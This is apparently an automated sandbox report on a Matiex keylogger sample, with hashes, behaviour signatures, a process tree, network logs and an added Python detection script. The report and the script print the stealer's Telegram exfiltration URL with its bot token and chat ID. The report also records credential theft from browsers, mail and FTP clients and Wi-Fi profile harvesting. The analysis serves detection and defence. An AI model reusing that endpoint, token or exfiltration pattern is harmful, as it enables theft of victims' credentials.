Resubmissions

Submitted          Task ID              Score
12-08-2021 13:20   210812-s5k1bdx2tj    10
12-08-2021 13:06   210812-ywwkwmkmzn    10
12-08-2021 12:42   210812-13ygffvy9j    10
12-08-2021 12:41   210812-ph9ze8t96a    10

Analysis

  • max time kernel
    156s
  • max time network
    158s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    12-08-2021 12:41

General

  • Target

    g6yzl1NROz6FgZi.exe

  • Size

    1.2MB

  • MD5

    7a8fa3fe4b23a2ca9612b2b1cf096f6a

  • SHA1

    898d020a309d30d33055978794b2131fa5a18698

  • SHA256

    9dacb6e97f39f81eee74d0779165f4a74e31f27cec1a67d52c541c52ed169d73

  • SHA512

    a77912743ed08c7814d6b3a7a3fea19728561f69891c862ea35957ca4886beded2ffea80342af5d9c7b45a8aa868cd8dc9edcc67b62e1b53f25d5c21be407370

Malware Config

Extracted

Family

matiex

C2

https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A/sendMessage?chat_id=1735544933

Signatures

  • Matiex

    Matiex is a keylogger and infostealer first seen in July 2020.

  • Matiex Main Payload 2 IoCs
  • suricata: ET MALWARE Matiex Keylogger Exfil Via Telegram

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk, and infostealers commonly target those files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP. In this run the sample first requests http://checkip.dyndns.org/ and then https://freegeoip.app/xml/154.61.71.51 (see the Network section), consistent with passing the address returned by the first service to the second for geolocation before exfiltrating.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system. In this run, however, the single IoC is attributed to the StorSvc service host (svchost.exe -s StorSvc, PID 1352) rather than to either instance of the sample (PIDs 4564 and 4180), so it should not be read as bootkit activity by the sample without confirming what was written and by whom.

  • Suspicious use of SetThreadContext 1 IoCs

    Raised by the first instance of the sample (PID 4564), which also calls WriteProcessMemory and then starts a second copy of itself (PID 4180). A parent writing into a freshly spawned copy of its own image and then setting that copy's thread context is consistent with process hollowing, and it is the second instance that goes on to run netsh and generate the network traffic below.

  • Drops file in Windows directory 3 IoCs

    In this run the IoCs are attributed to the CDPSvc service host (svchost.exe -s CDPSvc, PID 4576), not to the sample.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments. Here all four IoCs are attributed to MoNotificationUx.exe (PIDs 4632 and 4736), a Windows component, not to the sample.

  • Modifies data under HKEY_USERS 48 IoCs

    All of these IoCs are attributed to Windows components in the process tree (sihclient.exe and the BITS, CDPSvc and PcaSvc service hosts), not to the sample.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
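
As an added example (not part of this report and not Matiex code), the Python below implements the detection logic these signatures describe and runs it over events constructed from the report's process tree, the C2 URL in the Malware Config and the sendDocument POST in the Network section: the "netsh wlan show profile" child, the checkip.dyndns.org and freegeoip.app lookups, the IE6-era User-Agent sent to checkip.dyndns.org, and the Telegram Bot API call, whose bot id, chat_id and percent-encoded caption it parses. The event field names (kind, process, parent, cmdline, method, url, user_agent) are an assumed generic EDR/proxy schema, not any product's.

```python
"""Detection logic for the Matiex behaviours this report records.

Added example, not part of the sandbox report and not Matiex code. The
events below are constructed from the report's process tree and HTTP
records; the event field names are an assumed generic EDR/proxy schema.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Telegram Bot API path: /bot<bot_id>:<token>/<method>
TELEGRAM_PATH_RE = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]+)/([A-Za-z]+)$")
# Public IP lookup services the sample queried before exfiltrating
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "freegeoip.app"}
# IE6 / Windows Server 2003 user agent the sample sent from a Windows 11 host
LEGACY_UA_RE = re.compile(r"MSIE 6\.0; Windows NT 5\.2; \.NET CLR ?1\.0\.3705")

# Constructed from the report: two instances of the sample, netsh started by
# the second one, its HTTP requests, and one benign Windows Update request.
SAMPLE = "g6yzl1NROz6FgZi.exe"
EVENTS = [
    {"kind": "process", "process": SAMPLE, "parent": SAMPLE,
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"'},
    {"kind": "process", "process": "netsh.exe", "parent": SAMPLE,
     "cmdline": '"netsh" wlan show profile'},
    {"kind": "http", "process": SAMPLE, "method": "GET",
     "url": "http://checkip.dyndns.org/",
     "user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"},
    {"kind": "http", "process": SAMPLE, "method": "GET",
     "url": "https://freegeoip.app/xml/154.61.71.51", "user_agent": ""},
    {"kind": "http", "process": SAMPLE, "method": "POST",
     "url": ("https://api.telegram.org/bot1769394961:AAF5BB35akL859CwVaXypIqpVsGWlaKvi7A"
             "/sendDocument?chat_id=1735544933&caption=%20Pc%20Name:%20Admin%20-%20Matiex"
             "%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C"),
     "user_agent": ""},
    {"kind": "http", "process": "sihclient.exe", "method": "GET",
     "url": "https://slscr.update.microsoft.com/", "user_agent": ""},
]


def parse_telegram_bot_call(url):
    """Return bot_id, method, chat_id and the decoded caption of a Bot API
    call, or None if the URL is not one. The token itself is deliberately
    not returned: the bot id is enough to pivot on, and the token is a
    credential that should not end up in tickets or alert text."""
    u = urlsplit(url)
    if u.hostname != "api.telegram.org":
        return None
    m = TELEGRAM_PATH_RE.match(u.path)
    if not m:
        return None
    q = parse_qs(u.query)
    return {
        "bot_id": m.group(1),
        "method": m.group(3),
        "chat_id": q.get("chat_id", [None])[0],
        "caption": q.get("caption", [""])[0],  # parse_qs already percent-decodes
    }


def detect(events):
    """Run the per-event rules, then correlate per process: a process that
    both looks up its public IP and posts to a Telegram bot is flagged as a
    Matiex-style stealer. Returns a list of (rule, process, detail) tuples."""
    findings = []
    ip_lookup_by, telegram_by = set(), set()
    for ev in events:
        proc = ev["process"]
        if ev["kind"] == "process":
            if proc.lower() == "netsh.exe" and "wlan show profile" in ev["cmdline"].lower():
                findings.append(("wifi_profile_harvest", ev["parent"], ev["cmdline"]))
            continue
        host = (urlsplit(ev["url"]).hostname or "").lower()
        if host in IP_LOOKUP_HOSTS:
            ip_lookup_by.add(proc)
            findings.append(("external_ip_lookup", proc, host))
        if LEGACY_UA_RE.search(ev.get("user_agent", "")):
            findings.append(("legacy_dotnet_user_agent", proc, ev["user_agent"]))
        call = parse_telegram_bot_call(ev["url"])
        if call and call["method"] in ("sendMessage", "sendDocument"):
            telegram_by.add(proc)
            findings.append(("telegram_bot_exfil", proc, call))
    for proc in sorted(ip_lookup_by & telegram_by):
        findings.append(("matiex_like_stealer", proc,
                         "public IP lookup and Telegram bot post from the same process"))
    return findings


if __name__ == "__main__":
    for rule, proc, detail in detect(EVENTS):
        print(f"{rule:26} {proc:20} {detail!r}")
```

The correlation rule is what turns this from a hunt into an alert: public IP lookups are common in legitimate software and api.telegram.org is ordinary traffic on many networks, but one process doing both in a single run is the exfiltration pattern this report shows. The decoded caption (" Pc Name: Admin - Matiex Keylogger ... Recovered Passwords") is the same string the sandbox saw, which is why the family name appears in the Suricata rule.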

Processes

  • C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe
    "C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4564
    • C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe
      "C:\Users\Admin\AppData\Local\Temp\g6yzl1NROz6FgZi.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\SysWOW64\netsh.exe
        "netsh" wlan show profile
        3⤵
        PID:3052
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:4552
  • C:\Windows\system32\wlrmdr.exe
    -c -s 0 -f 0 -t Empty -m Empty -a 0 -u Empty
    1⤵
    PID:4544
  • C:\Windows\system32\MoNotificationUx.exe
    %systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications
    1⤵
    • Checks processor information in registry
    PID:4632
  • C:\Windows\system32\MoNotificationUx.exe
    %systemroot%\system32\MoNotificationUx.exe /ClearActiveNotifications
    1⤵
    • Checks processor information in registry
    PID:4736
  • C:\Windows\System32\sihclient.exe
    C:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.2
    1⤵
    • Modifies data under HKEY_USERS
    PID:3856
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
    1⤵
    • Modifies data under HKEY_USERS
    PID:2160
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
    1⤵
    PID:1124
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    PID:4576
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2908
    • C:\Windows\System32\pcaui.exe
      C:\Windows\System32\pcaui.exe -n 0 -a "" -v "" -g "" -x ""
      2⤵
      PID:1456
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
    1⤵
    • Enumerates connected drives
    • Writes to the Master Boot Record (MBR)
    PID:1352
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1452
    • C:\Program Files\Windows Defender\mpcmdrun.exe
      "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
      2⤵
      PID:4016

Network

            • flag-unknown
              DNS
              crl3.digicert.com
              Remote address:
              8.8.8.8:53
              Request
              crl3.digicert.com
              IN A
              Response
              crl3.digicert.com
              IN CNAME
              cs9.wac.phicdn.net
              cs9.wac.phicdn.net
              IN A
              93.184.220.29
            • flag-unknown
              DNS
              go.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              go.microsoft.com
              IN A
              Response
              go.microsoft.com
              IN CNAME
              go.microsoft.com.edgekey.net
              go.microsoft.com.edgekey.net
              IN CNAME
              e11290.dspg.akamaiedge.net
              e11290.dspg.akamaiedge.net
              IN A
              2.18.105.186
            • flag-unknown
              DNS
              dmd.metaservices.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              dmd.metaservices.microsoft.com
              IN A
              Response
              dmd.metaservices.microsoft.com
              IN CNAME
              devicemetadataservice.trafficmanager.net
              devicemetadataservice.trafficmanager.net
              IN CNAME
              vmss-prod-eas.eastasia.cloudapp.azure.com
              vmss-prod-eas.eastasia.cloudapp.azure.com
              IN A
              20.189.118.208
            • flag-unknown
              DNS
              oneocsp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              oneocsp.microsoft.com
              IN A
              Response
              oneocsp.microsoft.com
              IN CNAME
              oneocsp-microsoft-com.a-0003.a-msedge.net
              oneocsp-microsoft-com.a-0003.a-msedge.net
              IN CNAME
              a-0003.a-msedge.net
              a-0003.a-msedge.net
              IN A
              204.79.197.203
            • flag-unknown
              DNS
              nexusrules.officeapps.live.com
              Remote address:
              8.8.8.8:53
              Request
              nexusrules.officeapps.live.com
              IN A
              Response
              nexusrules.officeapps.live.com
              IN CNAME
              prod.nexusrules.live.com.akadns.net
              prod.nexusrules.live.com.akadns.net
              IN A
              52.109.12.18
            • flag-unknown
              DNS
              config.edge.skype.com
              Remote address:
              8.8.8.8:53
              Request
              config.edge.skype.com
              IN A
              Response
              config.edge.skype.com
              IN CNAME
              config.edge.skype.com.trafficmanager.net
              config.edge.skype.com.trafficmanager.net
              IN CNAME
              l-0014.config.skype.com
              l-0014.config.skype.com
              IN CNAME
              config-edge-skype.l-0014.l-msedge.net
              config-edge-skype.l-0014.l-msedge.net
              IN CNAME
              l-0014.l-msedge.net
              l-0014.l-msedge.net
              IN A
              13.107.42.23
            • flag-unknown
              DNS
              tsfe.trafficshaping.dsp.mp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              tsfe.trafficshaping.dsp.mp.microsoft.com
              IN A
              Response
              tsfe.trafficshaping.dsp.mp.microsoft.com
              IN CNAME
              tsfe.trafficmanager.net
              tsfe.trafficmanager.net
              IN A
              20.54.110.119
            • flag-unknown
              DNS
              ctldl.windowsupdate.com
              Remote address:
              8.8.8.8:53
              Request
              ctldl.windowsupdate.com
              IN A
              Response
              ctldl.windowsupdate.com
              IN CNAME
              au-bg-shim.trafficmanager.net
              au-bg-shim.trafficmanager.net
              IN CNAME
              audownload.windowsupdate.nsatc.net
              audownload.windowsupdate.nsatc.net
              IN CNAME
              au.download.windowsupdate.com.edgesuite.net
              au.download.windowsupdate.com.edgesuite.net
              IN CNAME
              a767.dscg3.akamai.net
              a767.dscg3.akamai.net
              IN A
              95.101.78.82
              a767.dscg3.akamai.net
              IN A
              88.221.144.130
            • flag-unknown
              DNS
              login.live.com
              Remote address:
              8.8.8.8:53
              Request
              login.live.com
              IN A
              Response
              login.live.com
              IN CNAME
              login.msa.msidentity.com
              login.msa.msidentity.com
              IN CNAME
              www.tm.lg.prod.aadmsa.akadns.net
              www.tm.lg.prod.aadmsa.akadns.net
              IN CNAME
              prda.aadg.msidentity.com
              prda.aadg.msidentity.com
              IN CNAME
              www.tm.a.prd.aadg.akadns.net
              www.tm.a.prd.aadg.akadns.net
              IN A
              20.190.159.138
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.143
              www.tm.a.prd.aadg.akadns.net
              IN A
              20.190.159.134
              www.tm.a.prd.aadg.akadns.net
              IN A
              20.190.159.132
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.4
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.135
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.6
              www.tm.a.prd.aadg.akadns.net
              IN A
              40.126.31.137
            • flag-unknown
              DNS
              ocsp.digicert.com
              Remote address:
              8.8.8.8:53
              Request
              ocsp.digicert.com
              IN A
              Response
              ocsp.digicert.com
              IN CNAME
              cs9.wac.phicdn.net
              cs9.wac.phicdn.net
              IN A
              93.184.220.29
            • flag-unknown
              DNS
              settings-win.data.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              settings-win.data.microsoft.com
              IN A
              Response
              settings-win.data.microsoft.com
              IN CNAME
              settingsfd-geo.trafficmanager.net
              settingsfd-geo.trafficmanager.net
              IN A
              20.73.194.208
            • flag-unknown
              DNS
              slscr.update.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              slscr.update.microsoft.com
              IN A
              Response
              slscr.update.microsoft.com
              IN CNAME
              slscr.update.microsoft.com.akadns.net
              slscr.update.microsoft.com.akadns.net
              IN CNAME
              sls.update.microsoft.com.akadns.net
              sls.update.microsoft.com.akadns.net
              IN CNAME
              sls.emea.update.microsoft.com.akadns.net
              sls.emea.update.microsoft.com.akadns.net
              IN A
              52.242.101.226
            • flag-unknown
              DNS
              fe3cr.delivery.mp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              fe3cr.delivery.mp.microsoft.com
              IN A
              Response
              fe3cr.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.mp.microsoft.com
              fe3.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              20.54.89.15
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              52.242.97.97
            • flag-unknown
              DNS
              fe3cr.delivery.mp.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              fe3cr.delivery.mp.microsoft.com
              IN A
              Response
              fe3cr.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.mp.microsoft.com
              fe3.delivery.mp.microsoft.com
              IN CNAME
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              52.152.108.96
              fe3.delivery.dsp.mp.microsoft.com.nsatc.net
              IN A
              52.242.97.97
            • flag-unknown
              DNS
              slscr.update.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              slscr.update.microsoft.com
              IN A
              Response
              slscr.update.microsoft.com
              IN CNAME
              slscr.update.microsoft.com.akadns.net
              slscr.update.microsoft.com.akadns.net
              IN CNAME
              sls.update.microsoft.com.akadns.net
              sls.update.microsoft.com.akadns.net
              IN CNAME
              sls.emea.update.microsoft.com.akadns.net
              sls.emea.update.microsoft.com.akadns.net
              IN A
              40.125.122.176
            • flag-unknown
              DNS
              checkip.dyndns.org
              Remote address:
              8.8.8.8:53
              Request
              checkip.dyndns.org
              IN A
              Response
              checkip.dyndns.org
              IN CNAME
              checkip.dyndns.com
              checkip.dyndns.com
              IN A
              158.101.44.242
              checkip.dyndns.com
              IN A
              132.226.8.169
              checkip.dyndns.com
              IN A
              216.146.43.71
              checkip.dyndns.com
              IN A
              132.226.247.73
              checkip.dyndns.com
              IN A
              216.146.43.70
              checkip.dyndns.com
              IN A
              193.122.6.168
              checkip.dyndns.com
              IN A
              193.122.130.0
            • flag-unknown
              DNS
              freegeoip.app
              Remote address:
              8.8.8.8:53
              Request
              freegeoip.app
              IN A
              Response
              freegeoip.app
              IN A
              172.67.188.154
              freegeoip.app
              IN A
              104.21.19.200
            • flag-unknown
              DNS
              api.telegram.org
              Remote address:
              8.8.8.8:53
              Request
              api.telegram.org
              IN A
              Response
              api.telegram.org
              IN A
              149.154.167.220
            • flag-unknown
              DNS
              ctldl.windowsupdate.com
              Remote address:
              8.8.8.8:53
              Request
              ctldl.windowsupdate.com
              IN A
              Response
              ctldl.windowsupdate.com
              IN CNAME
              au-bg-shim.trafficmanager.net
              au-bg-shim.trafficmanager.net
              IN CNAME
              audownload.windowsupdate.nsatc.net
              audownload.windowsupdate.nsatc.net
              IN CNAME
              wu.azureedge.net
              wu.azureedge.net
              IN CNAME
              wu.ec.azureedge.net
              wu.ec.azureedge.net
              IN CNAME
              wu.wpc.apr-52dd2.edgecastdns.net
              wu.wpc.apr-52dd2.edgecastdns.net
              IN CNAME
              hlb.apr-52dd2-0.edgecastdns.net
              hlb.apr-52dd2-0.edgecastdns.net
              IN CNAME
              cs11.wpc.v0cdn.net
              cs11.wpc.v0cdn.net
              IN A
              93.184.221.240
            • flag-unknown
              DNS
              fs.microsoft.com
              Remote address:
              8.8.8.8:53
              Request
              fs.microsoft.com
              IN A
              Response
              fs.microsoft.com
              IN CNAME
              prod.fs.microsoft.com.akadns.net
              prod.fs.microsoft.com.akadns.net
              IN CNAME
              fs-wildcard.microsoft.com.edgekey.net
              fs-wildcard.microsoft.com.edgekey.net
              IN CNAME
              fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
              fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
              IN CNAME
              e1723.g.akamaiedge.net
              e1723.g.akamaiedge.net
              IN A
              104.81.140.70
            • flag-unknown
              POST
              http://go.microsoft.com/fwlink/?LinkID=252669&clcid=0x409
              Remote address:
              2.18.105.186:80
              Request
              POST /fwlink/?LinkID=252669&clcid=0x409 HTTP/1.1
              Connection: Keep-Alive
              Content-Type: text/xml; charset="UTF-16LE"
              User-Agent: MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT
              SOAPAction: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
              Content-Length: 2058
              Host: go.microsoft.com
              Response
              HTTP/1.1 302 Moved Temporarily
              Server: AkamaiGHost
              Content-Length: 0
              Location: http://dmd.metaservices.microsoft.com/metadata.svc
              Expires: Thu, 12 Aug 2021 12:42:05 GMT
              Cache-Control: max-age=0, no-cache, no-store
              Pragma: no-cache
              Date: Thu, 12 Aug 2021 12:42:05 GMT
              Connection: close
            • flag-unknown
              POST
              http://dmd.metaservices.microsoft.com/metadata.svc
              Remote address:
              20.189.118.208:80
              Request
              POST /metadata.svc HTTP/1.1
              Connection: Keep-Alive
              Content-Type: text/xml; charset="UTF-16LE"
              User-Agent: MICROSOFT_DEVICE_METADATA_RETRIEVAL_CLIENT
              SOAPAction: "http://schemas.microsoft.com/windowsmetadata/services/2007/09/18/dms/DeviceMetadataService/GetDeviceMetadata"
              Content-Length: 2058
              Host: dmd.metaservices.microsoft.com
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:05 GMT
              Content-Type: text/xml; charset=utf-16LE
              Content-Length: 1734
              Connection: keep-alive
              Cache-Control: private
              Server: Microsoft-IIS/10.0
              X-AspNet-Version: 4.0.30319
              Request-Context: appId=cid-v1:c490f1e8-2a51-43a5-b06d-d2230108e17f
              Access-Control-Expose-Headers: Request-Context
              X-Powered-By: ASP.NET
            • flag-unknown
              GET
              http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D
              Remote address:
              204.79.197.203:80
              Request
              GET /ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBTGiIgTPSKVrjq%2B8RiHf4oAukNOPgQUDyBd16FXlduSzyvQx8J3BM5ygHYCEzMAAVMvTIKOYqwLk7gAAAABUy8%3D HTTP/1.1
              Cache-Control: max-age = 86400
              Connection: Keep-Alive
              Accept: */*
              If-Modified-Since: Tue, 03 Aug 2021 22:13:33 GMT
              If-None-Match: "6b402eed49753b33b692db60a2fd5cbce222748b2d4cf3452a45f06a41bcf15d"
              User-Agent: Microsoft-CryptoAPI/10.0
              Host: oneocsp.microsoft.com
              Response
              HTTP/1.1 200 OK
              Cache-Control: max-age=86400
              Content-Length: 1763
              Content-Type: application/ocsp-response
              Expires: Mon, 16 Aug 2021 15:50:23 GMT
              Last-Modified: Wed, 11 Aug 2021 14:13:34 GMT
              ETag: "bf67479aabbc127a7498b4b6933d326f5dd795b50f266ff4285a7590a461989a"
              Server: Microsoft-IIS/10.0
              X-Cache: TCP_HIT
              X-Powered-By: ASP.NET
              x-content-type-options: nosniff
              X-Azure-Ref-OriginShield: Ref A: 464A5886A8574BBA91B9115E1E2C2067 Ref B: HEL01EDGE1007 Ref C: 2021-08-12T10:56:42Z
              X-MSEdge-Ref: Ref A: 166C2F1489B6493199F9A14007C4B599 Ref B: AMBEDGE0818 Ref C: 2021-08-12T12:42:05Z
              Date: Thu, 12 Aug 2021 12:42:04 GMT
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:56 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:56 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              http://checkip.dyndns.org/
              g6yzl1NROz6FgZi.exe
              Remote address:
              158.101.44.242:80
              Request
              GET / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
              Host: checkip.dyndns.org
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: text/html
              Content-Length: 104
              Connection: keep-alive
              Cache-Control: no-cache
              Pragma: no-cache
            • flag-unknown
              GET
              https://freegeoip.app/xml/154.61.71.51
              g6yzl1NROz6FgZi.exe
              Remote address:
              172.67.188.154:443
              Request
              GET /xml/154.61.71.51 HTTP/1.1
              Host: freegeoip.app
              Connection: Keep-Alive
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:57 GMT
              Content-Type: application/xml
              Content-Length: 334
              Connection: keep-alive
              vary: Origin
              x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
              x-ratelimit-limit: 15000
              x-ratelimit-remaining: 14996
              x-ratelimit-reset: 3412
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sZwucct339OsCywDCnfhJNdiK5Y%2B451fADjtI1ANDOpdISGLYuuvoxqq4BXGEqI2%2FCxnORfXOd5AqCWgo%2FJb90Z4yslrwRVmhOry8q1uucBLStfhvgiZDpKntdznU9Gs"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 67d9c95aadf472b7-AMS
              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            • flag-unknown
              GET
              https://freegeoip.app/xml/154.61.71.51
              g6yzl1NROz6FgZi.exe
              Remote address:
              172.67.188.154:443
              Request
              GET /xml/154.61.71.51 HTTP/1.1
              Host: freegeoip.app
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: application/xml
              Content-Length: 334
              Connection: keep-alive
              vary: Origin
              x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
              x-ratelimit-limit: 15000
              x-ratelimit-remaining: 14995
              x-ratelimit-reset: 3411
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NG%2FH6SJY2e2jYe8AdfoE7dCVY9oXqkUP89b5OrvVB%2Bx1egyc9EADHVZecuHsRai9HHUlNzWVDBUD0K0TG%2Bjbg7THK0UHYfArcKUbbTN4drhU%2BX%2BwJ748Er8%2FRgdhwu%2Bg"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 67d9c9623f0272b7-AMS
              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            • flag-unknown
              GET
              https://freegeoip.app/xml/154.61.71.51
              g6yzl1NROz6FgZi.exe
              Remote address:
              172.67.188.154:443
              Request
              GET /xml/154.61.71.51 HTTP/1.1
              Host: freegeoip.app
              Response
              HTTP/1.1 200 OK
              Date: Thu, 12 Aug 2021 12:42:58 GMT
              Content-Type: application/xml
              Content-Length: 334
              Connection: keep-alive
              vary: Origin
              x-database-date: Thu, 16 Jul 2020 08:44:46 GMT
              x-ratelimit-limit: 15000
              x-ratelimit-remaining: 14994
              x-ratelimit-reset: 3411
              CF-Cache-Status: DYNAMIC
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
